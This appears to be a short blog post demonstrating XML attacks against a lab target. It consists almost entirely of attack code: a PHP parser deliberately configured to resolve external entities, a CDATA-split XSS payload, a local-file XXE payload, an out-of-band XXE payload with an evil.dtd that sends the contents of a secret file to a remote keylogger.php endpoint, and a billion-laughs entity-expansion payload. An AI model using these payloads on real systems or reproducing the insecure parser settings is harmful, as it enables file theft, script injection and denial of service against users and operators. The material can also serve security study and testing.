Proof Of Concept
if (isset($_GET["submit"])){
$xml = $_GET["xml"];
libxml_disable_entity_loader(false);
$dom = new DOMDocument();
$dom->resolveExternals = true;
$dom->substituteEntities = true;
$dom->preserveWhiteSpace = true;
$dom->loadXML($xml, LIBXML_NOENT);
echo $dom->textContent;
}Manual Exploitation
<test><![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]></test><!DOCTYPE change-log [
<!ENTITY systemEntity SYSTEM "file.txt">
]>
<change-log>
<text>&systemEntity;</text>
</change-log>Out-of-band XML External Entity (OOB-XXE)
<!DOCTYPE change-log [
<!ENTITY % file SYSTEM "file:///C:/secret.txt" >
<!ENTITY % data SYSTEM "http://192.168.231.1/vulnerable/xml/oob/evil.dtd">
%data;
]>
<change-log>
<text>&send;</text>
</change-log>Content of evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.231.1/keylogger/keylogger.php?c=%file;'>"> %all; |
| Content of file:///C:/secret.txt captured |
Billion laughs attack
<!DOCTYPE lolz [
<!ENTITY lol "lol ">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
No comments:
Post a Comment